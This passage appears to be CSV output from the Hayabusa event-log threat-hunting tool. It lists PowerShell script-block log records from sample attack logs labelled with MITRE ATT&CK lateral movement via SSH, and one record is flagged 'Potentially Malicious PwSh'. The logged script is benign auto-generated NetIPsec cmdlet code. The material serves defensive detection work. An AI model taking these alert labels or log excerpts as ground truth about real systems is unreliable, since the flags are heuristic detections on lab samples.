Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQ",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] 